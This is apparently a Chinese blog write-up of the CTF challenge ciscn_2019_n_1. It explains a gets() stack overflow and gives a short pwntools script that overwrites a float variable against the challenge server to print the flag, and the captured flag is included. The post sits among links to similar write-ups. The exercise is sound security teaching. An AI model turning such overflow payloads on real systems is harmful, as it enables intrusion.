ciscn_2019_n_1

最新推荐文章于 2023-05-27 13:26:51 发布
最新推荐文章于 2023-05-27 13:26:51 发布
阅读量405 收藏
点赞数 1
分类专栏: BU pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52034946/article/details/112663852
版权

检查,64位

ida查看
在这里插入图片描述
又是gets函数,思路来了,一直输入挤满栈,直到v2处输入11.28125

11.28125的16进制转换是 0x41348000h

脚本
from pwn import*

r = remote(“node3.buuoj.cn”,29950)

flag_addr = 0x41348000

payload = “a”*(0x30-0x4)+p64(flag_addr)

r.sendline(payload)

r.interactive()

0x30 - 0x4 就是v1到v2处的空间,全部都用a填充,

flag{2c92d9a7-0024-444f-8ce6-73681313a769}

theThreeDay
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn_2019_n_1 ——两种解法
qq_41696518的博客
07-13 2400
ciscn_2019_n_1 两种解法
BUUCTF ciscn_2019_n_1
RookieMOR的博客
05-14 581
1.下载文件,用checksec一下: 2.用IDA64查看,进入func函数: 当v2=11.28125时获得flag,但只有v1的输入,没有v2输入。因为有一个gets函数,点击v1,v2可以知道,v1与v2差44个字节,可以通过输入v1的值去改变v2的值,实现栈溢出。 查看汇编可以看到有一个uconiss的比较指令,把xmm0与cs:dword_4007F4,由movss可以知道xmme0是v1或v2的值,那么点击dword_4007F4 看到一个 dd ,百度一下可以知道,.
BUU-ciscn_2019_n_1
qq_45771413的博客
04-27 201
检查保护 IDA 函数主体很简单:初始化v2为0.0 ;输入数字存进v1,然后让v2和11.28125进行对比,相同则自动 cat flag 解题 gets函数明晃晃地摆在主函数里,准备对v1动手。 可以看到v1长度 0x30,下面v2的长度为 0x4 进去瞅瞅:v1和v2紧挨着,而且v1覆盖v2的空间 那exp思路就很清晰了,把v1到v2首地址之间的空间都填满,然后填进值11.28125,这样就能覆盖v2初始化的0.0 从而满足条件跳转猫flag。 Tips: 关于11.28125的输入: 浮点输入
BUUCTF—ciscn_2019_n_1 1
qq_41560595的博客
09-24 4211
这道题是栈溢出题型,又不同于一般的栈溢出,在此做个总结。 查看权限 拖入IDA,F5可用函数 解题思路:这道题的意思是输入字符串v1,判断v2。考虑输入长字符串覆盖到存储v2的内存空间,把v2的值改掉。 因此,覆盖0x30-0x4=44个字节给v1,另外4个字节给v2 由于v2数值在内存中以16进制存储,所以,找到11.28125的16进制值。 存在两个比较指令,双击进去。 0x41348000就是16进制的11.28125。 编写脚本 from pwn import * p=remote('
2021_09_15_ciscn_2019_n_1
m0_51187558的博客
09-15 2707
ciscn_2019_n_1 前言 每日一题pwn方向的第二题。也是初入漏洞利用的一道特别基础的题。 大家都应该尝试着做过了上一道,也就是test your nc。从解法来说其实那道题的难度真的只是半脚踩在入门的门坎上。就像wp中所说的那样,目前pwn题的核心是通过漏洞挖掘与利用来提权,而nc这道题可以说是不需要任何漏洞的挖掘与利用,做出这道题并不代表你已经入门pwn了。 虽然如此,从ciscn_2019_n_1这道题开始,我们真正要开始尝试迈过pwn题的那一道门槛,面对一些简单的漏洞进行利用了。 做题流程
【BUUCTF - PWN】ciscn_2019_n_1
古月浪子的博客
03-19 3561
checksec一下 IDA打开,发现如果满足的条件达成,就能get flag 找到栈溢出漏洞,输入可以覆盖到v2 写代码把11.28125在内存中的十六进制表示出来 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ...
BUUCTF刷题之路-ciscn_2019_n_11
qq_30528603的博客
05-27 161
非常简单的逻辑,类似于一个猜数字游戏,猜对了弹出flag,失败了还贴心的告诉你可能值。我们要做的就是修改v2变量的内容,让他等于11.28125。这次我们不需要覆盖返回地址只需要改v2的值就好了。接着我们算一下偏移【rbp-30h-rbp+4h】得到偏移为44个字节。意思就是说我们在44个字节之后填入11.28125覆盖v2的值就能使if语句成立。题目只开启了堆栈不可执行。无非就是不能在栈上执行shellcode无伤大雅。
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.csdn.net/A951860555/article/details/111991072
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
CISCN_frontend
04-17
前端界面展示(待定)项目模板来源安装:nodejs环境python3环境根目录下执行npm installpip install werkzeug flask flask_cors我这里用了伪后端(为了开发方便,后期融合到django中,到时候再进行更改),伪后端...
Markdown学习笔记
04-30
Markdown学习笔记
热塑性弹性体,全球前21强生产商排名及市场份额.docx
04-30
热塑性弹性体,全球前21强生产商排名及市场份额
配合eclipse svn插件subclipse-4.3.4版本的javahl
04-30
配合eclipse svn插件subclipse-4.3.4版本的javahl,将其中的features和plugins目录解压到与subclipse-4.3.4插件同一目录下即可。在eclipse 4.31版本上验证有效。
一个基于epoll的多线程 linux c http web服务器.zip
最新发布
04-30
一个基于epoll的多线程 linux c http web服务器.zip
ciscn_2019_c_1
09-12
根据您提供的引用内容和,题目"ciscn_2019_c_1"是一个涉及到fastbin堆漏洞利用的题目。fastbin是一个堆区的数据结构,用于存储小于等于64字节的空闲块。这个题目的漏洞利用难度不大,适合初学者练习。 根据的代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值